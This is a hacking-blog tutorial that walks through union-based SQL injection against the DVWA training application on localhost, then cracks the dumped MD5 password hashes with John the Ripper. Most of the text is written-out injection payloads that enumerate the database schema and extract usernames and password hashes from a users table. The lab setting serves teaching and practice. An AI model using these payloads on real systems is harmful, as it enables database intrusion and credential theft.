Wednesday, Feb 21, 2018
HomeHacking ArticlesUnion Based Injection using John the Ripper

Union Based Injection using John the Ripper

Whats hacked

Union Based Injection using John the Ripper

System used :: Kali Linux

Testing on localhost :: (DVWA)

  • Open Xampp on Linux and Start MySQL and Apache Server

  • Open Iceweasel and write

Login to the Application

Username : admin , Password : password

    • Setup the security level from ‘High’ to ‘Low’ under DVWA security

    • Setup the Database under Setup tab

    • Click on SQL injection to begin testing

  • Enter 1 in the User ID Field

User sees the GET method

  • Check for Exception Handling’&Submit=Submit#

  • Checking using the True Conditions$’ or ‘1’=’1&Submit=Submit#

The above injection reveal the user id’s in the userdb database.

  • Checking for number of columns, returning the SQL query’ order by 1–+&Submit=Submit#’ order by 5–+&Submit=Submit#’ order by 3–+&Submit=Submit#’ order by 2–+&Submit=Submit#

This shows the number of columns are 2

  • Using ‘Union Select’ to consolidate 2 columns’ union select 1, 2–+&Submit=Submit#

  • For vulnerable columns, make id=-1’ union select 1, 2–+&Submit=Submit#

  • Check for version’ union select null, version()–+&Submit=Submit#

  • To search for database, version and user’ union select concat(database(), ‘ ‘, version()), user()–+&Submit=Submit#

  • To search for corresponding details’ union select null, table_name from information_schema.tables –+&Submit=Submit#

  • For checking specific table, example ‘users’ , in the particular database, here’ union select null, table_name from information_schema.tables  where table_name = “users%”–+&Submit=Submit#

This SQL query will display all the tables consisting of keyword “users”

  • Under ‘users’ table, checking for column names’ union select null, column_name from information_schema.columns  where table_name = “users”–+&Submit=Submit#

  • Checking and consolidation all the details of all the columns:’ union select concat(user_id,’ ‘,first_name,’ ‘,last_name,’ ‘avatar),concat(user,’ ‘,password) from users–+&Submit=Submit#

    • Copy the users & passwords and save them in <user>:<password> format in “password.txt” file under /Home

    • Using John the Ripper application for cracking the password, with format md5


Hence we have user names & their corresponding passwords.


This is tutorial is by lucideus (rahul tyagi ) Images Quality may not good so that post can load in a proper time ,stay tuned for more tutorials

Read More :Special Interview of India’s Famous White Hat Hacker Rahul Tyagi | Lucideus

Over 500 Hacked Face
how to hack website

The Man Behind the meethackers is me who usually follow hacker's thinking and now covering tech topics to provide latest updates from the cyber and tech world or